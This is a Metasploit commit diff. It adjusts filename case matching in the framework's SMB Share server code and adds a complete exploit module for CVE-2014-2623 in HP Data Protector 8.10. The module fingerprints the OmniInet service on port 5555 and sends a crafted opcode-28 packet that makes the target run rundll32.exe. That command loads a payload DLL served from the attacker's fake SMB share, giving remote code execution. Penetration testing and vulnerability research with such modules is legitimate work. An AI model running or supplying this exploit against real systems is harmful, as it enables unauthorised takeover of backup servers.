Land rapid7#4451, @0x41414141's module for CVE-2014-2623, using the new SMB Share mixin

Author: jvazquez-r7

lib/msf/core/exploit/smb/server/share/command/nt_create_andx.rb

@@ -26,13 +26,13 @@ def smb_cmd_nt_create_andx(c, buff)
               payload = file_name
             end
 
-            if payload.ends_with?(file_name)
+            if payload.ends_with?(file_name.downcase)
               vprint_status("SMB Share - #{smb[:ip]} SMB_COM_NT_CREATE_ANDX request for #{unc}... ")
               fid = smb[:file_id].to_i
               attribs = CONST::SMB_EXT_FILE_ATTR_NORMAL
               eof = file_contents.length
               is_dir = 0
-            elsif payload.eql?(path_name)
+            elsif payload.eql?(path_name.downcase)
               fid = smb[:dir_id].to_i
               attribs = CONST::SMB_EXT_FILE_ATTR_DIRECTORY
               eof = 0

lib/msf/core/exploit/smb/server/share/information_level/find.rb

@@ -14,14 +14,14 @@ module Find
           # @return [Fixnum] The number of bytes returned to the client as response.
           def smb_cmd_find_file_both_directory_info(c, path)
 
-            if path && path.include?(file_name)
+            if path && path.include?(file_name.downcase)
               data = Rex::Text.to_unicode(file_name)
               length = file_contents.length
               ea = 0
               alloc = 1048576 # Allocation Size = 1048576 || 1Mb
               attrib = CONST::SMB_EXT_FILE_ATTR_NORMAL
               search = 1
-            elsif path && path == path_name
+            elsif path && path == path_name.downcase
               data = Rex::Text.to_unicode(path_name)
               length = 0
               ea = 0x21
@@ -50,9 +50,9 @@ def smb_cmd_find_file_both_directory_info(c, path)
           # @param path [String] The path which the client is requesting info from.
           # @return [Fixnum] The number of bytes returned to the client as response.
           def smb_cmd_find_file_names_info(c, path)
-            if path && path.include?(file_name)
+            if path && path.include?(file_name.downcase)
               data = Rex::Text.to_unicode(file_name)
-            elsif path && path == path_name
+            elsif path && path == path_name.downcase
               data = Rex::Text.to_unicode(path_name)
             else
               return smb_error(CONST::SMB_COM_TRANSACTION2, c, CONST::SMB_STATUS_NO_SUCH_FILE, true)
@@ -68,14 +68,14 @@ def smb_cmd_find_file_names_info(c, path)
           # @param path [String] The path which the client is requesting info from.
           # @return [Fixnum] The number of bytes returned to the client as response.
           def smb_cmd_find_file_full_directory_info(c, path)
-            if path && path.include?(file_name)
+            if path && path.include?(file_name.downcase)
               data = Rex::Text.to_unicode(file_name)
               length = file_contents.length
               ea = 0
               alloc = 1048576 # Allocation Size = 1048576 || 1Mb
               attrib = CONST::SMB_EXT_FILE_ATTR_NORMAL # File
               search = 0x100
-            elsif path && path == path_name
+            elsif path && path == path_name.downcase
               data = Rex::Text.to_unicode(path_name)
               length = 0
               ea = 0x21

lib/msf/core/exploit/smb/server/share/information_level/query.rb

@@ -50,11 +50,11 @@ def smb_cmd_trans_query_file_info_standard(c, fid)
           # @return [Fixnum] The number of bytes returned to the client as response.
           # @todo Delete elsif comment if testing proofs it as unnecessary
           def smb_cmd_trans_query_path_info_basic(c, path)
-            if path && path.ends_with?(file_name)
+            if path && path.ends_with?(file_name.downcase)
               attrib = CONST::SMB_EXT_FILE_ATTR_NORMAL
             #elsif path && path.ends_with?(file_name + '.Local')
               #attrib = CONST::SMB_EXT_FILE_ATTR_NORMAL
-            elsif path && path == path_name
+            elsif path && path == path_name.downcase
               attrib = CONST::SMB_EXT_FILE_ATTR_DIRECTORY
             elsif path.nil? || path.empty? || path == "\x00" # empty path
               attrib = CONST::SMB_EXT_FILE_ATTR_DIRECTORY
@@ -72,9 +72,9 @@ def smb_cmd_trans_query_path_info_basic(c, path)
           # @param path [String] The path which the client is requesting info from.
           # @return [Fixnum] The number of bytes returned to the client as response.
           def smb_cmd_trans_query_path_info_standard(c, path)
-            if path && path.include?(file_name)
+            if path && path.include?(file_name.downcase)
               attrib = 0 # File attributes => file
-            elsif path && path == path_name
+            elsif path && path == path_name.downcase
               attrib = 1 # File attributes => directory
             elsif path.nil? || path.empty? || path == "\x00" # empty path
               attrib = 1 # File attributes => directory
@@ -99,9 +99,9 @@ def smb_cmd_trans_query_path_info_standard(c, path)
           # @return [Fixnum] The number of bytes returned to the client as response.
           def smb_cmd_trans_query_path_info_network(c, path)
 
-            if path && path.include?(file_name)
+            if path && path.include?(file_name.downcase)
               attrib = CONST::SMB_EXT_FILE_ATTR_NORMAL
-            elsif path && path == path_name
+            elsif path && path == path_name.downcase
               attrib = CONST::SMB_EXT_FILE_ATTR_DIRECTORY
             elsif path.nil? || path.empty? || path == "\x00" # empty path
               attrib = CONST::SMB_EXT_FILE_ATTR_DIRECTORY

modules/exploits/windows/misc/hp_dataprotector_cmd_exec.rb

@@ -0,0 +1,150 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::Remote::SMB::Server::Share
+  include Msf::Exploit::EXE
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => 'HP Data Protector 8.10 Remote Command Execution',
+      'Description'    => %q{
+        This module exploits a remote command execution on HP Data Protector 8.10. Arbitrary
+        commands can be execute by sending crafted requests with opcode 28 to the OmniInet
+        service listening on the TCP/5555 port. Since there is an strict length limitation on
+        the command, rundll32.exe is executed, and the payload is provided through a DLL by a
+        fake SMB server. This module has been tested successfully on HP Data Protector 8.1 on
+        Windows 7 SP1.
+      },
+      'Author'         => [
+        'Christian Ramirez', # POC
+        'Henoch Barrera', # POC
+        'Matthew Hall <hallm[at]sec-1.com>' # Metasploit Module
+      ],
+      'References'     =>
+        [
+          ['CVE', '2014-2623'],
+          ['OSVDB', '109069'],
+          ['EDB', '34066'],
+          ['URL', 'https://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c04373818']
+        ],
+      'DefaultOptions' =>
+        {
+          'EXITFUNC' => 'thread',
+        },
+      'Payload'        =>
+        {
+          'Space'       => 2048,
+          'DisableNops' => true
+        },
+      'Privileged'     => true,
+      'Platform'       => 'win',
+      'Stance'         => Msf::Exploit::Stance::Aggressive,
+      'Targets'        =>
+        [
+          [ 'HP Data Protector 8.10 / Windows', { } ],
+        ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Nov 02 2014'))
+
+      register_options(
+        [
+          Opt::RPORT(5555),
+          OptString.new('FILE_NAME', [ false, 'DLL File name to share']),
+          OptInt.new('SMB_DELAY', [true, 'Time that the SMB Server will wait for the payload request', 15])
+        ], self.class)
+
+      deregister_options('FILE_CONTENTS')
+  end
+
+  def check
+    fingerprint = get_fingerprint
+
+    if fingerprint.nil?
+      return Exploit::CheckCode::Unknown
+    end
+
+    print_status("#{peer} - HP Data Protector version #{fingerprint}")
+
+    if fingerprint =~ /HP Data Protector A\.08\.(\d+)/
+      minor = $1.to_i
+    else
+      return Exploit::CheckCode::Safe
+    end
+
+    if minor < 11
+      return Exploit::CheckCode::Appears
+    end
+
+    Exploit::CheckCode::Detected
+  end
+
+  def peer
+    "#{rhost}:#{rport}"
+  end
+
+  def get_fingerprint
+    ommni = connect
+    ommni.put(rand_text_alpha_upper(64))
+    resp = ommni.get_once(-1)
+    disconnect
+
+    if resp.nil?
+      return nil
+    end
+
+    Rex::Text.to_ascii(resp).chop.chomp # Delete unicode last null
+  end
+
+  def send_pkt(cmd)
+    cmd.gsub!("\\", "\\\\\\\\")
+
+    pkt = "2\x00"
+    pkt << "\x01\x01\x01\x01\x01\x01\x00"
+    pkt << "\x01\x00"
+    pkt << "\x01\x00"
+    pkt << "\x01\x00"
+    pkt << "\x01\x01\x00 "
+    pkt << "28\x00"
+    pkt << "\\perl.exe\x00 "
+    pkt << "-esystem('#{cmd}')\x00"
+
+    connect
+    sock.put([pkt.length].pack('N') + pkt)
+    disconnect
+  end
+
+  def primer
+    self.file_contents = generate_payload_dll
+    print_status("File available on #{unc}...")
+
+    print_status("#{peer} - Trying to execute remote DLL...")
+    sploit = "rundll32.exe #{unc},#{rand_text_numeric(1)}"
+    send_pkt(sploit)
+  end
+
+  def setup
+    super
+
+    self.file_name = datastore['FILE_NAME'] || "#{Rex::Text.rand_text_alpha(4 + rand(3))}.dll"
+
+    unless file_name =~ /\.dll$/
+      fail_with(Failure::BadConfig, "FILE_NAME must end with .dll")
+    end
+  end
+
+  def exploit
+    begin
+      Timeout.timeout(datastore['SMB_DELAY']) {super}
+    rescue Timeout::Error
+      # do nothing... just finish exploit and stop smb server...
+    end
+  end
+end